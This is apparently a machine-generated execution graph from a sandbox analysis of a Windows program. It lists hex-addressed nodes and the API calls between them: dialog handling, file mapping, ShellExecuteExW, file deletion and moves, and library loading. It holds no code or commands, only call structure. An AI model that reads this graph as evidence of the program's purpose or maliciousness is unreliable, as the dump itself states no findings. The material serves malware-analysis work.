                                      execution_graph 24924 f1ebf7 20 API calls 23040 f1e1f9 23041 f1e203 23040->23041 23044 f1df59 23041->23044 23072 f1dc67 23044->23072 23046 f1df73 23047 f1dfd0 23046->23047 23060 f1dff4 23046->23060 23048 f1ded7 DloadReleaseSectionWriteAccess 11 API calls 23047->23048 23049 f1dfdb RaiseException 23048->23049 23051 f1e1c9 23049->23051 23050 f1e0df 23059 f1e13d GetProcAddress 23050->23059 23065 f1e19b 23050->23065 23053 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23051->23053 23052 f1e06c LoadLibraryExA 23054 f1e0cd 23052->23054 23055 f1e07f GetLastError 23052->23055 23056 f1e1d8 23053->23056 23054->23050 23057 f1e0d8 FreeLibrary 23054->23057 23058 f1e0a8 23055->23058 23068 f1e092 23055->23068 23057->23050 23062 f1ded7 DloadReleaseSectionWriteAccess 11 API calls 23058->23062 23061 f1e14d GetLastError 23059->23061 23059->23065 23060->23050 23060->23052 23060->23054 23060->23065 23070 f1e160 23061->23070 23064 f1e0b3 RaiseException 23062->23064 23064->23051 23083 f1ded7 23065->23083 23066 f1ded7 DloadReleaseSectionWriteAccess 11 API calls 23067 f1e181 RaiseException 23066->23067 23069 f1dc67 ___delayLoadHelper2@8 11 API calls 23067->23069 23068->23054 23068->23058 23071 f1e198 23069->23071 23070->23065 23070->23066 23071->23065 23073 f1dc73 23072->23073 23074 f1dc99 23072->23074 23091 f1dd15 23073->23091 23074->23046 23077 f1dc94 23101 f1dc9a 23077->23101 23080 f1df24 23081 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23080->23081 23082 f1df55 23081->23082 23082->23046 23084 f1dee9 23083->23084 23085 f1df0b 23083->23085 23086 f1dd15 DloadLock 8 API calls 23084->23086 23085->23051 23087 f1deee 23086->23087 23088 f1df06 23087->23088 23089 f1de67 DloadProtectSection 3 API calls 23087->23089 23110 f1df0f 8 API calls 2 library calls 23088->23110 23089->23088 23092 f1dc9a DloadUnlock 3 API calls 23091->23092 23093 f1dd2a 23092->23093 23094 f1ec4a 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23093->23094 23095 f1dc78 23094->23095 23095->23077 23096 f1de67 23095->23096 23097 f1de7c DloadObtainSection 23096->23097 23098 f1de82 23097->23098 23099 f1deb7 VirtualProtect 23097->23099 23109 f1dd72 VirtualQuery GetSystemInfo 23097->23109 23098->23077 23099->23098 23102 f1dca7 23101->23102 23103 f1dcab 23101->23103 23102->23080 23104 f1dcb3 GetModuleHandleW 23103->23104 23105 f1dcaf 23103->23105 23106 f1dcc9 GetProcAddress 23104->23106 23108 f1dcc5 23104->23108 23105->23080 23107 f1dcd9 GetProcAddress 23106->23107 23106->23108 23107->23108 23108->23080 23109->23099 23110->23085 24874 f214f8 RaiseException 23115 f1aee0 23116 f1aeea __EH_prolog 23115->23116 23278 f0130b 23116->23278 23119 f1b5cb 23350 f1cd2e 23119->23350 23120 f1af2c 23122 f1afa2 23120->23122 23123 f1af39 23120->23123 23182 f1af18 23120->23182 23125 f1b041 GetDlgItemTextW 23122->23125 23130 f1afbc 23122->23130 23126 f1af75 23123->23126 23127 f1af3e 23123->23127 23125->23126 23131 f1b077 23125->23131 23138 f1af96 KiUserCallbackDispatcher 23126->23138 23126->23182 23137 f0ddd1 53 API calls 23127->23137 23127->23182 23128 f1b5f7 23132 f1b611 GetDlgItem SendMessageW 23128->23132 23133 f1b600 SendDlgItemMessageW 23128->23133 23129 f1b5e9 SendMessageW 23129->23128 23136 f0ddd1 53 API calls 23130->23136 23134 f1b08f GetDlgItem 23131->23134 23276 f1b080 23131->23276 23368 f19da4 GetCurrentDirectoryW 23132->23368 23133->23132 23140 f1b0c5 SetFocus 23134->23140 23141 f1b0a4 SendMessageW SendMessageW 23134->23141 23142 f1afde SetDlgItemTextW 23136->23142 23143 f1af58 23137->23143 23138->23182 23139 f1b641 GetDlgItem 23144 f1b664 SetWindowTextW 23139->23144 23145 f1b65e 23139->23145 23146 f1b0d5 23140->23146 23161 f1b0ed 23140->23161 23141->23140 23147 f1afec 23142->23147 23388 f01241 SHGetMalloc 23143->23388 23369 f1a2c7 GetClassNameW 23144->23369 23145->23144 23150 f0ddd1 53 API calls 23146->23150 23155 f1aff9 GetMessageW 23147->23155 
23147->23182 23154 f1b0df 23150->23154 23151 f1af5f 23156 f1af63 SetDlgItemTextW 23151->23156 23151->23182 23152 f1b56b 23157 f0ddd1 53 API calls 23152->23157 23389 f1cb5a 23154->23389 23160 f1b010 IsDialogMessageW 23155->23160 23155->23182 23156->23182 23162 f1b57b SetDlgItemTextW 23157->23162 23160->23147 23165 f1b01f TranslateMessage DispatchMessageW 23160->23165 23166 f0ddd1 53 API calls 23161->23166 23163 f1b58f 23162->23163 23167 f0ddd1 53 API calls 23163->23167 23165->23147 23169 f1b124 23166->23169 23171 f1b5b8 23167->23171 23168 f1b6af 23175 f1b6df 23168->23175 23179 f0ddd1 53 API calls 23168->23179 23170 f0400a _swprintf 51 API calls 23169->23170 23176 f1b136 23170->23176 23177 f0ddd1 53 API calls 23171->23177 23172 f1b0e6 23288 f0a04f 23172->23288 23174 f1bdf5 98 API calls 23174->23168 23181 f1bdf5 98 API calls 23175->23181 23214 f1b797 23175->23214 23180 f1cb5a 16 API calls 23176->23180 23177->23182 23186 f1b6c2 SetDlgItemTextW 23179->23186 23180->23172 23188 f1b6fa 23181->23188 23183 f1b847 23189 f1b850 EnableWindow 23183->23189 23190 f1b859 23183->23190 23184 f1b174 GetLastError 23185 f1b17f 23184->23185 23294 f1a322 SetCurrentDirectoryW 23185->23294 23187 f0ddd1 53 API calls 23186->23187 23192 f1b6d6 SetDlgItemTextW 23187->23192 23196 f1b70c 23188->23196 23215 f1b731 23188->23215 23189->23190 23193 f1b876 23190->23193 23407 f012c8 GetDlgItem EnableWindow 23190->23407 23192->23175 23195 f1b89d 23193->23195 23204 f1b895 SendMessageW 23193->23204 23194 f1b195 23199 f1b1ac 23194->23199 23200 f1b19e GetLastError 23194->23200 23195->23182 23206 f0ddd1 53 API calls 23195->23206 23405 f19635 32 API calls 23196->23405 23197 f1b78a 23201 f1bdf5 98 API calls 23197->23201 23205 f1b227 23199->23205 23209 f1b237 23199->23209 23211 f1b1c4 GetTickCount 23199->23211 23200->23199 23201->23214 23203 f1b86c 23408 f012c8 GetDlgItem EnableWindow 23203->23408 23204->23195 23205->23209 23210 f1b46c 23205->23210 23213 f1b8b6 SetDlgItemTextW 23206->23213 23207 f1b725 
23207->23215 23217 f1b407 23209->23217 23218 f1b24f GetModuleFileNameW 23209->23218 23310 f012e6 GetDlgItem ShowWindow 23210->23310 23219 f0400a _swprintf 51 API calls 23211->23219 23212 f1b825 23406 f19635 32 API calls 23212->23406 23213->23182 23214->23183 23214->23212 23221 f0ddd1 53 API calls 23214->23221 23215->23197 23222 f1bdf5 98 API calls 23215->23222 23217->23126 23230 f0ddd1 53 API calls 23217->23230 23399 f0eb3a 80 API calls 23218->23399 23225 f1b1dd 23219->23225 23221->23214 23227 f1b75f 23222->23227 23223 f1b47c 23311 f012e6 GetDlgItem ShowWindow 23223->23311 23295 f0971e 23225->23295 23226 f1b844 23226->23183 23227->23197 23231 f1b768 DialogBoxParamW 23227->23231 23229 f1b275 23233 f0400a _swprintf 51 API calls 23229->23233 23234 f1b41b 23230->23234 23231->23126 23231->23197 23232 f1b486 23235 f0ddd1 53 API calls 23232->23235 23236 f1b297 CreateFileMappingW 23233->23236 23237 f0400a _swprintf 51 API calls 23234->23237 23239 f1b490 SetDlgItemTextW 23235->23239 23240 f1b2f9 GetCommandLineW 23236->23240 23241 f1b376 __vswprintf_c_l 23236->23241 23242 f1b439 23237->23242 23312 f012e6 GetDlgItem ShowWindow 23239->23312 23246 f1b30a 23240->23246 23244 f1b381 ShellExecuteExW 23241->23244 23255 f0ddd1 53 API calls 23242->23255 23243 f1b203 23247 f1b215 23243->23247 23248 f1b20a GetLastError 23243->23248 23270 f1b39e 23244->23270 23400 f1ab2e SHGetMalloc 23246->23400 23303 f09653 23247->23303 23248->23247 23249 f1b4a2 SetDlgItemTextW GetDlgItem 23252 f1b4d7 23249->23252 23253 f1b4bf GetWindowLongW SetWindowLongW 23249->23253 23313 f1bdf5 23252->23313 23253->23252 23254 f1b326 23401 f1ab2e SHGetMalloc 23254->23401 23255->23126 23259 f1b332 23402 f1ab2e SHGetMalloc 23259->23402 23261 f1b3e1 23261->23217 23267 f1b3f7 UnmapViewOfFile CloseHandle 23261->23267 23262 f1bdf5 98 API calls 23264 f1b4f3 23262->23264 23263 f1b33e 23403 f0ecad 80 API calls ___scrt_fastfail 23263->23403 23338 f1d0f5 23264->23338 23267->23217 23269 f1b355 MapViewOfFile 23269->23241 
23270->23261 23271 f1b3cd Sleep 23270->23271 23271->23261 23271->23270 23272 f1bdf5 98 API calls 23275 f1b519 23272->23275 23273 f1b542 23404 f012c8 GetDlgItem EnableWindow 23273->23404 23275->23273 23277 f1bdf5 98 API calls 23275->23277 23276->23126 23276->23152 23277->23273 23279 f01314 23278->23279 23280 f0136d 23278->23280 23281 f0137a 23279->23281 23409 f0da98 61 API calls 2 library calls 23279->23409 23410 f0da71 GetWindowLongW SetWindowLongW 23280->23410 23281->23119 23281->23120 23281->23182 23284 f01336 23284->23281 23285 f01349 GetDlgItem 23284->23285 23285->23281 23286 f01359 23285->23286 23286->23281 23287 f0135f SetWindowTextW 23286->23287 23287->23281 23291 f0a059 23288->23291 23289 f0a0ea 23290 f0a207 9 API calls 23289->23290 23292 f0a113 23289->23292 23290->23292 23291->23289 23291->23292 23411 f0a207 23291->23411 23292->23184 23292->23185 23294->23194 23296 f09728 23295->23296 23297 f09792 CreateFileW 23296->23297 23298 f09786 23296->23298 23297->23298 23299 f097e4 23298->23299 23300 f0b66c 2 API calls 23298->23300 23299->23243 23301 f097cb 23300->23301 23301->23299 23302 f097cf CreateFileW 23301->23302 23302->23299 23304 f09677 23303->23304 23305 f09688 23303->23305 23304->23305 23306 f09683 23304->23306 23307 f0968a 23304->23307 23305->23205 23458 f09817 23306->23458 23463 f096d0 23307->23463 23310->23223 23311->23232 23312->23249 23314 f1bdff __EH_prolog 23313->23314 23319 f1b4e5 23314->23319 23478 f1aa36 23314->23478 23317 f1aa36 ExpandEnvironmentStringsW 23324 f1be36 _wcsrchr 23317->23324 23318 f1c11d SetWindowTextW 23318->23324 23319->23262 23324->23317 23324->23318 23324->23319 23325 f1bf0b SetFileAttributesW 23324->23325 23330 f1c2e7 GetDlgItem SetWindowTextW SendMessageW 23324->23330 23333 f1c327 SendMessageW 23324->23333 23482 f117ac CompareStringW 23324->23482 23483 f19da4 GetCurrentDirectoryW 23324->23483 23485 f0a52a 7 API calls 23324->23485 23486 f0a4b3 FindClose 23324->23486 23487 f1ab9a 76 API calls new 23324->23487 23488 f235de 
23324->23488 23327 f1bfc5 GetFileAttributesW 23325->23327 23337 f1bf25 ___scrt_fastfail 23325->23337 23327->23324 23329 f1bfd7 DeleteFileW 23327->23329 23329->23324 23331 f1bfe8 23329->23331 23330->23324 23332 f0400a _swprintf 51 API calls 23331->23332 23334 f1c008 GetFileAttributesW 23332->23334 23333->23324 23334->23331 23335 f1c01d MoveFileW 23334->23335 23335->23324 23336 f1c035 MoveFileExW 23335->23336 23336->23324 23337->23324 23337->23327 23484 f0b4f7 52 API calls 2 library calls 23337->23484 23339 f1d0ff __EH_prolog 23338->23339 23512 f0fead 23339->23512 23341 f1d130 23516 f05c59 23341->23516 23343 f1d14e 23520 f07c68 23343->23520 23347 f1d1a1 23537 f07cfb 23347->23537 23349 f1b504 23349->23272 23351 f1cd38 23350->23351 24010 f19d1a 23351->24010 23354 f1cd45 GetWindow 23355 f1b5d1 23354->23355 23360 f1cd65 23354->23360 23355->23128 23355->23129 23356 f1cd72 GetClassNameW 24015 f117ac CompareStringW 23356->24015 23358 f1cd96 GetWindowLongW 23359 f1cdfa GetWindow 23358->23359 23361 f1cda6 SendMessageW 23358->23361 23359->23355 23359->23360 23360->23355 23360->23356 23360->23358 23360->23359 23361->23359 23362 f1cdbc GetObjectW 23361->23362 24016 f19d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23362->24016 23364 f1cdd3 24017 f19d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23364->24017 24018 f19f5d 8 API calls ___scrt_fastfail 23364->24018 23367 f1cde4 SendMessageW DeleteObject 23367->23359 23368->23139 23370 f1a2e8 23369->23370 23371 f1a30d 23369->23371 24021 f117ac CompareStringW 23370->24021 23375 f1a7c3 23371->23375 23373 f1a2fb 23373->23371 23374 f1a2ff FindWindowExW 23373->23374 23374->23371 23376 f1a7cd __EH_prolog 23375->23376 23377 f01380 82 API calls 23376->23377 23378 f1a7ef 23377->23378 24022 f01f4f 23378->24022 23381 f1a809 23384 f01631 84 API calls 23381->23384 23382 f1a818 23383 f01951 126 API calls 23382->23383 23386 f1a83a __vswprintf_c_l new 23383->23386 23385 f1a814 23384->23385 23385->23168 23385->23174 23386->23385 23387 f01631 84 API 
calls 23386->23387 23387->23385 23388->23151 23390 f1ac74 5 API calls 23389->23390 23391 f1cb66 GetDlgItem 23390->23391 23392 f1cb88 23391->23392 23393 f1cbbc SendMessageW SendMessageW 23391->23393 23396 f1cb93 ShowWindow SendMessageW SendMessageW 23392->23396 23394 f1cc17 SendMessageW SendMessageW SendMessageW 23393->23394 23395 f1cbf8 23393->23395 23397 f1cc4a SendMessageW 23394->23397 23398 f1cc6d SendMessageW 23394->23398 23395->23394 23396->23393 23397->23398 23398->23172 23399->23229 23400->23254 23401->23259 23402->23263 23403->23269 23404->23276 23405->23207 23406->23226 23407->23203 23408->23193 23409->23284 23410->23281 23412 f0a214 23411->23412 23413 f0a238 23412->23413 23414 f0a22b CreateDirectoryW 23412->23414 23432 f0a180 23413->23432 23414->23413 23416 f0a26b 23414->23416 23421 f0a27a 23416->23421 23424 f0a444 23416->23424 23418 f0a27e GetLastError 23418->23421 23421->23291 23422 f0a254 23422->23418 23423 f0a258 CreateDirectoryW 23422->23423 23423->23416 23423->23418 23445 f1e360 23424->23445 23427 f0a494 23427->23421 23428 f0a467 23429 f0b66c 2 API calls 23428->23429 23430 f0a47b 23429->23430 23430->23427 23431 f0a47f SetFileAttributesW 23430->23431 23431->23427 23447 f0a194 23432->23447 23435 f0b66c 23436 f0b679 23435->23436 23444 f0b683 23436->23444 23455 f0b806 CharUpperW 23436->23455 23438 f0b692 23456 f0b832 CharUpperW 23438->23456 23440 f0b6a1 23441 f0b6a5 23440->23441 23442 f0b71c GetCurrentDirectoryW 23440->23442 23457 f0b806 CharUpperW 23441->23457 23442->23444 23444->23422 23446 f0a451 SetFileAttributesW 23445->23446 23446->23427 23446->23428 23448 f1e360 23447->23448 23449 f0a1a1 GetFileAttributesW 23448->23449 23450 f0a1b2 23449->23450 23451 f0a189 23449->23451 23452 f0b66c 2 API calls 23450->23452 23451->23418 23451->23435 23453 f0a1c6 23452->23453 23453->23451 23454 f0a1ca GetFileAttributesW 23453->23454 23454->23451 23455->23438 23456->23440 23457->23444 23459 f09820 23458->23459 23460 f09824 23458->23460 23459->23305 23460->23459 
23469 f0a12d 23460->23469 23464 f096fa 23463->23464 23465 f096dc 23463->23465 23466 f09719 23464->23466 23477 f06e3e 74 API calls 23464->23477 23465->23464 23467 f096e8 FindCloseChangeNotification 23465->23467 23466->23305 23467->23464 23470 f1e360 23469->23470 23471 f0a13a DeleteFileW 23470->23471 23472 f0984c 23471->23472 23473 f0a14d 23471->23473 23472->23305 23474 f0b66c 2 API calls 23473->23474 23475 f0a161 23474->23475 23475->23472 23476 f0a165 DeleteFileW 23475->23476 23476->23472 23477->23466 23479 f1aa40 23478->23479 23480 f1aaf3 ExpandEnvironmentStringsW 23479->23480 23481 f1ab16 23479->23481 23480->23481 23481->23324 23482->23324 23483->23324 23484->23337 23485->23324 23486->23324 23487->23324 23489 f28606 23488->23489 23490 f28613 23489->23490 23491 f2861e 23489->23491 23501 f28518 23490->23501 23493 f28626 23491->23493 23500 f2862f __dosmaperr 23491->23500 23494 f284de _free 20 API calls 23493->23494 23497 f2861b 23494->23497 23495 f28634 23508 f2895a 20 API calls __dosmaperr 23495->23508 23496 f28659 HeapReAlloc 23496->23497 23496->23500 23497->23324 23500->23495 23500->23496 23509 f271ad 7 API calls 2 library calls 23500->23509 23502 f28556 23501->23502 23507 f28526 __dosmaperr 23501->23507 23511 f2895a 20 API calls __dosmaperr 23502->23511 23504 f28541 RtlAllocateHeap 23505 f28554 23504->23505 23504->23507 23505->23497 23507->23502 23507->23504 23510 f271ad 7 API calls 2 library calls 23507->23510 23508->23497 23509->23500 23510->23507 23511->23505 23513 f0feba 23512->23513 23541 f01789 23513->23541 23515 f0fed2 23515->23341 23517 f0fead 23516->23517 23518 f01789 76 API calls 23517->23518 23519 f0fed2 23518->23519 23519->23343 23521 f07c72 __EH_prolog 23520->23521 23558 f0c827 23521->23558 23523 f07c8d 23564 f1e24a 23523->23564 23525 f07cb7 23570 f1440b 23525->23570 23528 f07ddf 23529 f07de9 23528->23529 23530 f07e53 23529->23530 23602 f0a4c6 23529->23602 23534 f07ec4 23530->23534 23536 f0a4c6 8 API calls 23530->23536 23580 f0837f 23530->23580 23532 
f07f06 23532->23347 23534->23532 23608 f06dc1 74 API calls 23534->23608 23536->23530 23538 f07d09 23537->23538 23540 f07d10 23537->23540 23539 f11acf 84 API calls 23538->23539 23539->23540 23542 f0179f 23541->23542 23553 f017fa __vswprintf_c_l 23541->23553 23543 f017c8 23542->23543 23554 f06e91 74 API calls __vswprintf_c_l 23542->23554 23544 f01827 23543->23544 23550 f017e7 new 23543->23550 23546 f235de 22 API calls 23544->23546 23548 f0182e 23546->23548 23547 f017be 23555 f06efd 75 API calls 23547->23555 23548->23553 23557 f06efd 75 API calls 23548->23557 23550->23553 23556 f06efd 75 API calls 23550->23556 23553->23515 23554->23547 23555->23543 23556->23553 23557->23553 23559 f0c831 __EH_prolog 23558->23559 23560 f1e24a new 8 API calls 23559->23560 23561 f0c874 23560->23561 23562 f1e24a new 8 API calls 23561->23562 23563 f0c898 23562->23563 23563->23523 23567 f1e24f new 23564->23567 23565 f1e27b 23565->23525 23567->23565 23576 f271ad 7 API calls 2 library calls 23567->23576 23577 f1ecce RaiseException Concurrency::cancel_current_task new 23567->23577 23578 f1ecb1 RaiseException Concurrency::cancel_current_task 23567->23578 23571 f14415 __EH_prolog 23570->23571 23572 f1e24a new 8 API calls 23571->23572 23573 f14431 23572->23573 23574 f07ce6 23573->23574 23579 f106ba 78 API calls 23573->23579 23574->23528 23576->23567 23579->23574 23581 f08389 __EH_prolog 23580->23581 23609 f01380 23581->23609 23583 f083a4 23617 f09ef7 23583->23617 23589 f083d3 23740 f01631 23589->23740 23590 f083cf 23590->23589 23598 f0a4c6 8 API calls 23590->23598 23601 f0846e 23590->23601 23744 f0bac4 CompareStringW 23590->23744 23594 f084ce 23643 f01f00 23594->23643 23597 f084d9 23597->23589 23647 f03aac 23597->23647 23657 f0857b 23597->23657 23598->23590 23636 f08517 23601->23636 23603 f0a4db 23602->23603 23607 f0a4df 23603->23607 23998 f0a5f4 23603->23998 23605 f0a4ef 23606 f0a4f4 FindClose 23605->23606 23605->23607 23606->23607 23607->23529 23608->23532 23610 f01385 __EH_prolog 23609->23610 
23611 f0c827 8 API calls 23610->23611 23612 f013bd 23611->23612 23613 f1e24a new 8 API calls 23612->23613 23616 f01416 ___scrt_fastfail 23612->23616 23614 f01403 23613->23614 23614->23616 23745 f0b07d 23614->23745 23616->23583 23618 f09f0e 23617->23618 23619 f083ba 23618->23619 23761 f06f5d 76 API calls 23618->23761 23619->23589 23621 f019a6 23619->23621 23622 f019b0 __EH_prolog 23621->23622 23632 f01a00 23622->23632 23635 f019e5 23622->23635 23762 f0709d 23622->23762 23624 f01b50 23765 f06dc1 74 API calls 23624->23765 23626 f03aac 97 API calls 23630 f01bb3 23626->23630 23627 f01b60 23627->23626 23627->23635 23628 f01bff 23634 f01c32 23628->23634 23628->23635 23766 f06dc1 74 API calls 23628->23766 23630->23628 23631 f03aac 97 API calls 23630->23631 23631->23630 23632->23624 23632->23627 23632->23635 23633 f03aac 97 API calls 23633->23634 23634->23633 23634->23635 23635->23590 23637 f08524 23636->23637 23784 f10c26 GetSystemTime SystemTimeToFileTime 23637->23784 23639 f08488 23639->23594 23640 f11359 23639->23640 23786 f1d51a 23640->23786 23644 f01f05 __EH_prolog 23643->23644 23645 f01f39 23644->23645 23794 f01951 23644->23794 23645->23597 23648 f03ab8 23647->23648 23649 f03abc 23647->23649 23648->23597 23650 f03af7 23649->23650 23651 f03ae9 23649->23651 23929 f027e8 97 API calls 3 library calls 23650->23929 23655 f03b29 23651->23655 23928 f03281 85 API calls 3 library calls 23651->23928 23654 f03af5 23654->23655 23930 f0204e 74 API calls 23654->23930 23655->23597 23658 f08585 __EH_prolog 23657->23658 23659 f085be 23658->23659 23667 f085c2 23658->23667 23953 f184bd 99 API calls 23658->23953 23660 f085e7 23659->23660 23665 f0867a 23659->23665 23659->23667 23662 f08609 23660->23662 23660->23667 23954 f07b66 151 API calls 23660->23954 23662->23667 23955 f184bd 99 API calls 23662->23955 23665->23667 23931 f05e3a 23665->23931 23667->23597 23668 f08705 23668->23667 23937 f0826a 23668->23937 23671 f08875 23672 f0a4c6 8 API calls 23671->23672 23675 f088e0 23671->23675 
23672->23675 23674 f0c991 80 API calls 23678 f0893b _memcmp 23674->23678 23941 f07d6c 23675->23941 23676 f08a70 23677 f08b43 23676->23677 23683 f08abf 23676->23683 23682 f08b9e 23677->23682 23692 f08b4e 23677->23692 23678->23667 23678->23674 23678->23676 23679 f08a69 23678->23679 23956 f08236 82 API calls 23678->23956 23957 f01f94 74 API calls 23678->23957 23958 f01f94 74 API calls 23679->23958 23691 f08b30 23682->23691 23961 f080ea 96 API calls 23682->23961 23685 f0a180 4 API calls 23683->23685 23683->23691 23684 f08b9c 23686 f09653 79 API calls 23684->23686 23689 f08af7 23685->23689 23686->23667 23688 f09653 79 API calls 23688->23667 23689->23691 23959 f09377 96 API calls 23689->23959 23690 f08c09 23703 f08c74 23690->23703 23739 f091c1 __except_handler4 23690->23739 23962 f09989 23690->23962 23691->23684 23691->23690 23692->23684 23960 f07f26 100 API calls __except_handler4 23692->23960 23693 f0aa88 8 API calls 23696 f08cc3 23693->23696 23699 f0aa88 8 API calls 23696->23699 23698 f08c4c 23698->23703 23966 f01f94 74 API calls 23698->23966 23717 f08cd9 23699->23717 23701 f08c62 23967 f07061 75 API calls 23701->23967 23703->23693 23704 f08d9c 23705 f08df7 23704->23705 23706 f08efd 23704->23706 23707 f08e69 23705->23707 23708 f08e07 23705->23708 23710 f08f23 23706->23710 23711 f08f0f 23706->23711 23727 f08e27 23706->23727 23709 f0826a CharUpperW 23707->23709 23713 f08e4d 23708->23713 23721 f08e15 23708->23721 23714 f08e84 23709->23714 23712 f12c42 75 API calls 23710->23712 23715 f092e6 121 API calls 23711->23715 23716 f08f3c 23712->23716 23713->23727 23970 f07907 108 API calls 23713->23970 23723 f08eb4 23714->23723 23724 f08ead 23714->23724 23714->23727 23715->23727 23973 f128f1 121 API calls 23716->23973 23717->23704 23968 f09b21 SetFilePointer GetLastError SetEndOfFile 23717->23968 23969 f01f94 74 API calls 23721->23969 23972 f09224 94 API calls __EH_prolog 23723->23972 23971 f07698 84 API calls __except_handler4 23724->23971 23733 f0904b 23727->23733 23974 f01f94 
74 API calls 23727->23974 23729 f09156 23730 f0a444 4 API calls 23729->23730 23729->23739 23732 f091b1 23730->23732 23731 f09104 23948 f09d62 23731->23948 23732->23739 23975 f01f94 74 API calls 23732->23975 23733->23729 23733->23731 23733->23739 23947 f09ebf SetEndOfFile 23733->23947 23736 f0914b 23738 f096d0 75 API calls 23736->23738 23738->23729 23739->23688 23741 f01643 23740->23741 23990 f0c8ca 23741->23990 23744->23590 23746 f0b087 __EH_prolog 23745->23746 23751 f0ea80 80 API calls 23746->23751 23748 f0b099 23752 f0b195 23748->23752 23751->23748 23753 f0b1a7 ___scrt_fastfail 23752->23753 23756 f10948 23753->23756 23759 f10908 GetCurrentProcess GetProcessAffinityMask 23756->23759 23760 f0b10f 23759->23760 23760->23616 23761->23619 23767 f016d2 23762->23767 23764 f070b9 23764->23632 23765->23635 23766->23634 23768 f016e8 23767->23768 23779 f01740 __vswprintf_c_l 23767->23779 23769 f01711 23768->23769 23780 f06e91 74 API calls __vswprintf_c_l 23768->23780 23771 f01767 23769->23771 23776 f0172d new 23769->23776 23773 f235de 22 API calls 23771->23773 23772 f01707 23781 f06efd 75 API calls 23772->23781 23775 f0176e 23773->23775 23775->23779 23783 f06efd 75 API calls 23775->23783 23776->23779 23782 f06efd 75 API calls 23776->23782 23779->23764 23780->23772 23781->23769 23782->23779 23783->23779 23785 f10c56 __vsnwprintf_l 23784->23785 23785->23639 23787 f1d527 23786->23787 23788 f0ddd1 53 API calls 23787->23788 23789 f1d54a 23788->23789 23790 f0400a _swprintf 51 API calls 23789->23790 23791 f1d55c 23790->23791 23792 f1cb5a 16 API calls 23791->23792 23793 f11372 23792->23793 23793->23594 23795 f01961 23794->23795 23797 f0195d 23794->23797 23798 f01896 23795->23798 23797->23645 23799 f018a8 23798->23799 23800 f018e5 23798->23800 23801 f03aac 97 API calls 23799->23801 23806 f03f18 23800->23806 23804 f018c8 23801->23804 23804->23797 23810 f03f21 23806->23810 23807 f03aac 97 API calls 23807->23810 23808 f01906 23808->23804 23811 f01e00 23808->23811 23810->23807 
23810->23808 23823 f1067c 23810->23823 23812 f01e0a __EH_prolog 23811->23812 23831 f03b3d 23812->23831 23814 f01e34 23815 f01ebb 23814->23815 23816 f016d2 76 API calls 23814->23816 23815->23804 23817 f01e4b 23816->23817 23859 f01849 76 API calls 23817->23859 23819 f01e63 23821 f01e6f 23819->23821 23860 f1137a MultiByteToWideChar 23819->23860 23861 f01849 76 API calls 23821->23861 23824 f10683 23823->23824 23825 f1069e 23824->23825 23829 f06e8c RaiseException Concurrency::cancel_current_task 23824->23829 23827 f106af SetThreadExecutionState 23825->23827 23830 f06e8c RaiseException Concurrency::cancel_current_task 23825->23830 23827->23810 23829->23825 23830->23827 23832 f03b47 __EH_prolog 23831->23832 23833 f03b79 23832->23833 23834 f03b5d 23832->23834 23836 f03dc2 23833->23836 23839 f03ba5 23833->23839 23890 f06dc1 74 API calls 23834->23890 23907 f06dc1 74 API calls 23836->23907 23838 f03b68 23838->23814 23839->23838 23862 f12c42 23839->23862 23841 f03c26 23843 f03cb1 23841->23843 23858 f03c1d 23841->23858 23893 f0c991 23841->23893 23842 f03c22 23842->23841 23892 f02034 76 API calls 23842->23892 23875 f0aa88 23843->23875 23845 f03c12 23891 f06dc1 74 API calls 23845->23891 23846 f03bf4 23846->23841 23846->23842 23846->23845 23848 f03cc4 23852 f03d48 23848->23852 23853 f03d3e 23848->23853 23899 f128f1 121 API calls 23852->23899 23879 f092e6 23853->23879 23856 f03d46 23856->23858 23900 f01f94 74 API calls 23856->23900 23901 f11acf 23858->23901 23859->23819 23860->23821 23861->23815 23863 f12c51 23862->23863 23865 f12c5b 23862->23865 23908 f06efd 75 API calls 23863->23908 23866 f12c9d Concurrency::cancel_current_task 23865->23866 23867 f12ca2 new 23865->23867 23874 f12cfd ___scrt_fastfail 23865->23874 23910 f2157a RaiseException 23866->23910 23868 f12da9 Concurrency::cancel_current_task 23867->23868 23869 f12cd9 23867->23869 23867->23874 23911 f2157a RaiseException 23868->23911 23909 f12b7b 75 API calls 3 library calls 23869->23909 23873 f12dc1 23874->23846 23876 
f0aa95 23875->23876 23878 f0aa9f 23875->23878 23877 f1e24a new 8 API calls 23876->23877 23877->23878 23878->23848 23880 f092f0 __EH_prolog 23879->23880 23912 f07dc6 23880->23912 23883 f0709d 76 API calls 23884 f09302 23883->23884 23915 f0ca6c 23884->23915 23886 f0935c 23886->23856 23887 f0ca6c 114 API calls 23889 f09314 23887->23889 23889->23886 23889->23887 23924 f0cc51 97 API calls __vswprintf_c_l 23889->23924 23890->23838 23891->23858 23892->23841 23894 f0c9b2 23893->23894 23895 f0c9c4 23893->23895 23925 f06249 80 API calls 23894->23925 23926 f06249 80 API calls 23895->23926 23898 f0c9bc 23898->23843 23899->23856 23900->23858 23902 f11ad9 23901->23902 23903 f11af2 23902->23903 23906 f11b06 23902->23906 23927 f1075b 84 API calls 23903->23927 23905 f11af9 23905->23906 23907->23838 23908->23865 23909->23874 23910->23868 23911->23873 23913 f0acf5 GetVersionExW 23912->23913 23914 f07dcb 23913->23914 23914->23883 23921 f0ca82 __vswprintf_c_l 23915->23921 23916 f0cbf7 23917 f0cc1f 23916->23917 23918 f0ca0b 6 API calls 23916->23918 23919 f1067c SetThreadExecutionState RaiseException 23917->23919 23918->23917 23920 f0cbee 23919->23920 23920->23889 23921->23916 23921->23920 23922 f184bd 99 API calls 23921->23922 23923 f0ab70 89 API calls 23921->23923 23922->23921 23923->23921 23924->23889 23925->23898 23926->23898 23927->23905 23928->23654 23929->23654 23930->23655 23932 f05e4a 23931->23932 23976 f05d67 23932->23976 23935 f05e7d 23936 f05eb5 23935->23936 23981 f0ad65 CharUpperW CompareStringW 23935->23981 23936->23668 23938 f08289 23937->23938 23987 f1179d CharUpperW 23938->23987 23940 f08333 23940->23671 23942 f07d7b 23941->23942 23943 f07dbb 23942->23943 23988 f07043 74 API calls 23942->23988 23943->23678 23945 f07db3 23989 f06dc1 74 API calls 23945->23989 23947->23731 23949 f09d73 23948->23949 23952 f09d82 23948->23952 23950 f09d79 FlushFileBuffers 23949->23950 23949->23952 23950->23952 23951 